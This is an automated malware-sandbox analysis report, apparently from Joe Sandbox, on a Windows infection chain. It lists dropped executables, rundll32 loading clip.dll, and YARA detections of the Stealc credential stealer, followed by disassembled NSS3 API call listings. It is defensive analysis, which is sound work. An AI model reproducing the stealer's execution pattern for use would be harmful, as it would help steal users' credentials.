Commandline:	"C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe"
Imagebase:	0xd0000
File size:	1'769'472 bytes
MD5 hash:	38F7509D769058697F81EF17CFBE8C87
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000022.00000002.3041803841.00000000000D1000.00000040.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000022.00000003.3001438574.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000022.00000002.3043088426.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 29%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	22:56:35
Start date:	09/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe"
Imagebase:	0xaa0000
File size:	3'205'120 bytes
MD5 hash:	AE39EF9A549CC7FEB4940602F7F9AF7C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.3140028229.0000000001170000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.3184454599.0000000001170000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000023.00000002.3385606032.0000000005F51000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.3090456756.000000000116D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.3112297595.000000000116D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.3138038343.0000000001163000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.3092537480.000000000116D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.3168770434.0000000001170000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000023.00000003.3328651914.00000000083E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.3116272066.000000000116F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.3168645780.0000000001170000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.3138185002.000000000116F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	22:56:36
Start date:	09/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:
File size:	3'258'368 bytes
MD5 hash:	571952385750F4874BB235D9E5E61120
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	22:56:42
Start date:	09/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe"
Imagebase:	0x5c0000
File size:	2'825'728 bytes
MD5 hash:	954CC441DB8729CB9F76FDA40FE5B13A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 37%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	22:56:43
Start date:	09/11/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005203011\clip.dll, Main
Imagebase:	0x7ff66cf20000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	22:56:43
Start date:	09/11/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005203011\clip.dll, Main
Imagebase:	0x1000000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	22:56:50
Start date:	09/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=6ca8f7e5e2.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	22:56:50
Start date:	09/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2004,i,967901057161028773,948093207211853572,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	22:56:58
Start date:	09/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=price_comparison_service.mojom.DataProcessor --lang=en-GB --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=6244 --field-trial-handle=2100,i,12791048015529921744,10855682057704830667,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	22:57:00
Start date:	09/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe"
Imagebase:	0xaa0000
File size:	3'205'120 bytes
MD5 hash:	AE39EF9A549CC7FEB4940602F7F9AF7C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002B.00000003.3732193014.0000000008700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002B.00000003.3361596097.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002B.00000002.3776899724.0000000006261000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	22:57:09
Start date:	09/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe"
Imagebase:	0xd0000
File size:	1'769'472 bytes
MD5 hash:	38F7509D769058697F81EF17CFBE8C87
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002C.00000002.3470246270.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002C.00000002.3467869264.00000000000D1000.00000040.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002C.00000003.3378808453.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	22:57:15
Start date:	09/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3624 --field-trial-handle=2004,i,967901057161028773,948093207211853572,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	22:57:17
Start date:	09/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe"
Imagebase:	0x930000
File size:	2'825'728 bytes
MD5 hash:	954CC441DB8729CB9F76FDA40FE5B13A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 6C786E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C8D2120,6C787E60), ref: 6C786EBC
TlsGetValue.KERNEL32 ref: 6C786EDF
EnterCriticalSection.KERNEL32(?), ref: 6C786EF3
PR_WaitCondVar.NSS3(000000FF), ref: 6C786F25

Part of subcall function 6C75A900: TlsGetValue.KERNEL32(00000000,?,6C8D14E4,?,6C6F4DD9), ref: 6C75A90F
Part of subcall function 6C75A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C75A94F

PR_Unlock.NSS3 ref: 6C786F68
PORT_ZAlloc_Util.NSS3(00000008), ref: 6C786FA9
TlsGetValue.KERNEL32 ref: 6C7870B4
EnterCriticalSection.KERNEL32(?), ref: 6C7870C8
PR_CallOnce.NSS3(6C8D24C0,6C7C7590), ref: 6C787104
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C787117
SECOID_Init.NSS3 ref: 6C787128
PORT_Alloc_Util.NSS3(00000057), ref: 6C78714E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C78717F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7871A9
PR_NotifyAllCondVar.NSS3 ref: 6C7871CF
PR_Unlock.NSS3 ref: 6C7871DD
free.MOZGLUE(?), ref: 6C7871EE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C787208
free.MOZGLUE(00000000), ref: 6C787221
free.MOZGLUE(00000001), ref: 6C787235
TlsGetValue.KERNEL32 ref: 6C78724A
EnterCriticalSection.KERNEL32(?), ref: 6C78725E
PR_NotifyCondVar.NSS3 ref: 6C787273
PR_Unlock.NSS3 ref: 6C787281
SECMOD_DestroyModule.NSS3(00000000), ref: 6C787291
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7872B1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7872D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7872E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C787301
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C787310
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C787335
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C787344
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C787363
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C787372
PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6C8C0148,,defaultModDB,internalKeySlot), ref: 6C7874CC
free.MOZGLUE(00000000), ref: 6C787513
free.MOZGLUE(00000000), ref: 6C78751B
free.MOZGLUE(00000000), ref: 6C787528
free.MOZGLUE(00000000), ref: 6C78753C
free.MOZGLUE(00000000), ref: 6C787550
free.MOZGLUE(00000000), ref: 6C787561
free.MOZGLUE(00000000), ref: 6C787572
free.MOZGLUE(00000000), ref: 6C787583
free.MOZGLUE(00000000), ref: 6C787594
free.MOZGLUE(00000000), ref: 6C7875A2
SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6C7875BD
free.MOZGLUE(00000000), ref: 6C7875C8
free.MOZGLUE(00000000), ref: 6C7875F1
PR_NewLock.NSS3 ref: 6C787636
SECMOD_DestroyModule.NSS3(00000000), ref: 6C787686
PR_NewLock.NSS3 ref: 6C7876A2

Part of subcall function 6C8398D0: calloc.MOZGLUE(00000001,00000084,6C760936,00000001,?,6C76102C), ref: 6C8398E5

PORT_ZAlloc_Util.NSS3(00000050), ref: 6C7876B6
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6C787707
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C78771C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C787731
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6C78774A
DeleteCriticalSection.KERNEL32(?), ref: 6C787770
free.MOZGLUE(?), ref: 6C787779
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C78779A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7877AC
PORT_Alloc_Util.NSS3(-0000000D), ref: 6C7877C4
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C7877DB
strrchr.VCRUNTIME140(?,0000002F), ref: 6C787821
PORT_Alloc_Util.NSS3(?), ref: 6C787837
memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C78785B
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C78786F
SECMOD_AddNewModuleEx.NSS3 ref: 6C7878AC
free.MOZGLUE(00000000), ref: 6C7878BE
SECMOD_AddNewModuleEx.NSS3 ref: 6C7878F3
free.MOZGLUE(00000000), ref: 6C7878FC
free.MOZGLUE(00000000), ref: 6C78791C

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

Strings

,defaultModDB,internalKeySlot, xrefs: 6C78748D, 6C7874AA
name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6C7874C7
NSS Internal Module, xrefs: 6C7874A2, 6C7874C6
kbi., xrefs: 6C787886
Spac, xrefs: 6C787389
dbm:, xrefs: 6C787716
dll, xrefs: 6C78788E
rdb:, xrefs: 6C787744
extern:, xrefs: 6C78772B
sql:, xrefs: 6C7876FE

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
API String ID: 3465160547-3797173233
Opcode ID: 59ceca15c006276a158a829ad79c7e4c5c4fc9edc457764d1f10a4d53debfb7e
Instruction ID: 3ccd983a67b0681726c4798d83db760b87975cbd48aaea6c23cfc07634b254a3
Opcode Fuzzy Hash: 59ceca15c006276a158a829ad79c7e4c5c4fc9edc457764d1f10a4d53debfb7e
Instruction Fuzzy Hash: 2852D4B1F022059BEF219F64DE097AA7BB4AF0630CF144434FE1AA6A51E731E954CBD1

Function 6C77EA80 Relevance: 107.5, APIs: 49, Strings: 12, Instructions: 735stringmemoryCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(00000000), ref: 6C77EAB1

Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390AB
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390C9
Part of subcall function 6C839090: EnterCriticalSection.KERNEL32 ref: 6C8390E5
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C839116
Part of subcall function 6C839090: LeaveCriticalSection.KERNEL32 ref: 6C83913F

PR_ExitMonitor.NSS3 ref: 6C77EAC5

Part of subcall function 6C839440: TlsGetValue.KERNEL32 ref: 6C83945B
Part of subcall function 6C839440: TlsGetValue.KERNEL32 ref: 6C839479
Part of subcall function 6C839440: EnterCriticalSection.KERNEL32 ref: 6C839495
Part of subcall function 6C839440: TlsGetValue.KERNEL32 ref: 6C8394E4
Part of subcall function 6C839440: TlsGetValue.KERNEL32 ref: 6C839532
Part of subcall function 6C839440: LeaveCriticalSection.KERNEL32 ref: 6C83955D

PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C77EBAF
PR_Socket.NSS3(00000002,00000001,00000000), ref: 6C77EBF8
PR_StringToNetAddr.NSS3(?,?), ref: 6C77EC20
PORT_Alloc_Util.NSS3(00000800), ref: 6C77EC39
PR_GetHostByName.NSS3(?,00000000,00000800,?), ref: 6C77EC5A
PR_EnumerateHostEnt.NSS3(00000000,?,?,?), ref: 6C77EC85
free.MOZGLUE(?), ref: 6C77ECB6
PR_SetError.NSS3(FFFFE078,00000000), ref: 6C77ECCF
free.MOZGLUE(?), ref: 6C77ED10
free.MOZGLUE(?), ref: 6C77ED26
PR_InitializeNetAddr.NSS3(00000000,?,?), ref: 6C77ED35
PR_snprintf.NSS3(?,00000010,:%d,?), ref: 6C77ED7F
PR_smprintf.NSS3(POST %s HTTP/1.0Host: %s%sContent-Type: application/ocsp-requestContent-Length: %u,?,?,00000000,?), ref: 6C77EDAB
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C77EDBE
free.MOZGLUE(00000000), ref: 6C77EE9B
PR_smprintf.NSS3(GET %s HTTP/1.0Host: %s%s,?,?,00000000), ref: 6C77EEB1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C77EEC0
free.MOZGLUE(00000000), ref: 6C77EEE2
free.MOZGLUE(00000000), ref: 6C77EEF2
free.MOZGLUE(?), ref: 6C77EF15
free.MOZGLUE(?), ref: 6C77EF27
realloc.MOZGLUE(00000000,-00000401), ref: 6C77EF5C

Part of subcall function 6C77E910: PL_strncasecmp.NSS3(?,http://,00000007), ref: 6C77E93B
Part of subcall function 6C77E910: PR_SetError.NSS3(FFFFE075,00000000), ref: 6C77E94E

strstr.VCRUNTIME140(-000000F8,), ref: 6C77F00C
strstr.VCRUNTIME140(00000000,6C8C010D), ref: 6C77F03F
strchr.VCRUNTIME140(00000000,00000020), ref: 6C77F055
PL_strncasecmp.NSS3(00000000,HTTP/,00000005), ref: 6C77F06D
free.MOZGLUE(00000000), ref: 6C77F07A
PR_SetError.NSS3(FFFFE077,00000000), ref: 6C77F08A
strchr.VCRUNTIME140(?,00000020), ref: 6C77F0AC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,200), ref: 6C77F0C4
strchr.VCRUNTIME140(?,0000003A), ref: 6C77F0FA
strstr.VCRUNTIME140(-00000002,6C8C010D), ref: 6C77F124
PL_strcasecmp.NSS3(?,content-type), ref: 6C77F13D
PL_strcasecmp.NSS3(?,content-length), ref: 6C77F14F
atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 6C77F15F
PL_strcasecmp.NSS3(?,application/ocsp-response), ref: 6C77F1A0
memcpy.VCRUNTIME140(00000000,?), ref: 6C77F1CD
PR_SetError.NSS3(FFFFE077,00000000), ref: 6C77F231
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000000), ref: 6C77F387
memcpy.VCRUNTIME140(?,00000000,00000000), ref: 6C77F39C
free.MOZGLUE(00000000), ref: 6C77F3A5
free.MOZGLUE(00000000), ref: 6C77F3B1

Part of subcall function 6C760F00: PR_GetPageSize.NSS3(6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F1B
Part of subcall function 6C760F00: PR_NewLogModule.NSS3(clock,6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F25

Strings

HTTP/, xrefs: 6C77F067
GET, xrefs: 6C77EB53
http, xrefs: 6C77EB86
:%d, xrefs: 6C77ED73
content-length, xrefs: 6C77F149
application/ocsp-response, xrefs: 6C77F19A
content-type, xrefs: 6C77F137
POST %s HTTP/1.0Host: %s%sContent-Type: application/ocsp-requestContent-Length: %u, xrefs: 6C77EDA6
application/ocsp-request, xrefs: 6C77EE25
GET %s HTTP/1.0Host: %s%s, xrefs: 6C77EEAC
POST, xrefs: 6C77EB58, 6C77EB81
200, xrefs: 6C77F0BB

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$Value$Error$CriticalSection$EnterL_strcasecmpstrchrstrstr$AddrHostL_strncasecmpLeaveMonitorR_smprintfUtilmemcpystrlen$AllocAlloc_EnumerateExitInitializeItem_ModuleNamePageR_snprintfSizeSocketStringatoireallocstrcmp
String ID: 200$:%d$GET$GET %s HTTP/1.0Host: %s%s$HTTP/$POST$POST %s HTTP/1.0Host: %s%sContent-Type: application/ocsp-requestContent-Length: %u$application/ocsp-request$application/ocsp-response$content-length$content-type$http
API String ID: 3957390022-1324771758
Opcode ID: 180762262bbb8d78c5863d46e962c3c895dbe5e6eff1e1f95f57672ef6d7e32a
Instruction ID: 4d95745e49bfe1edb7ffdde1171e82f4aeb1d6b21232e131a2ca170b58bd7098
Opcode Fuzzy Hash: 180762262bbb8d78c5863d46e962c3c895dbe5e6eff1e1f95f57672ef6d7e32a
Instruction Fuzzy Hash: C542D3B1604305AFEB209F28DE85B5B77E8AF85348F04483CF94997B51E735E905CBA2

Function 6C77CA70 Relevance: 84.8, APIs: 56, Instructions: 849threadtimememoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C77CB45
PORT_ZAlloc_Util.NSS3(00000040), ref: 6C77CB5B
CERT_GetConstrainedCertificateNames.NSS3(?,00000010,?), ref: 6C77CBEB
realloc.MOZGLUE(?,00000000), ref: 6C77CC3B
PR_SetError.NSS3(FFFFE029,00000000), ref: 6C77CD25
PR_GetCurrentThread.NSS3 ref: 6C77CD35
CERT_FindCertIssuer.NSS3(?,00000001,?,00000001), ref: 6C77CD74
CERT_CheckCertValidTimes.NSS3(?,00000001,?,00000000), ref: 6C77CD9D
PR_GetCurrentThread.NSS3 ref: 6C77CDBA
PR_SetError.NSS3(FFFFE01E,00000000), ref: 6C77CDD2
PR_GetCurrentThread.NSS3 ref: 6C77CDE9
PR_SetError.NSS3(FFFFE024,00000000), ref: 6C77CE7C
PR_GetCurrentThread.NSS3 ref: 6C77CE93
PR_SetError.NSS3(FFFFE025,00000000), ref: 6C77CEC1
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C77CF8F
memcmp.VCRUNTIME140(?,6C8996B4,00000048), ref: 6C77CFC8
PR_GetCurrentThread.NSS3 ref: 6C77D071
CERT_GetCertTrust.NSS3(?,?), ref: 6C77D091
PR_SetError.NSS3(FFFFE024,00000000), ref: 6C77D0C6
PR_GetCurrentThread.NSS3 ref: 6C77D0DD
PR_SetError.NSS3(FFFFE05A,00000000), ref: 6C77D116
PR_GetCurrentThread.NSS3 ref: 6C77D131
PR_SetError.NSS3(FFFFE014,00000000), ref: 6C77D1D9
PR_SetError.NSS3(FFFFE014,00000000), ref: 6C77D225
CERT_DestroyCertificate.NSS3(?), ref: 6C77D410
PR_SetError.NSS3(FFFFE0B6,00000000), ref: 6C77D44E
PR_GetCurrentThread.NSS3 ref: 6C77D45E
PR_GetCurrentThread.NSS3 ref: 6C77D1EC

Part of subcall function 6C77C9A0: PORT_ArenaAlloc_Util.NSS3(00000000,00000018,?,00000001,00000000,?,6C77D864,?,00000000,?), ref: 6C77C9AE

PR_SetError.NSS3(FFFFE014,00000000), ref: 6C77D285
PR_GetCurrentThread.NSS3 ref: 6C77D298
PR_SetError.NSS3(FFFFE014,00000000), ref: 6C77D2D7
PR_SetError.NSS3(FFFFE014,00000000), ref: 6C77D330
PR_GetCurrentThread.NSS3 ref: 6C77D34C
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C77D392
CERT_DestroyCertificate.NSS3(?), ref: 6C77D3BC
PR_SetError.NSS3(FFFFE00D,00000000), ref: 6C77D3DF
PR_GetCurrentThread.NSS3 ref: 6C77D3EE
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C77CE12

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_GetCurrentThread.NSS3 ref: 6C77CE22
PR_GetCurrentThread.NSS3 ref: 6C77CED8
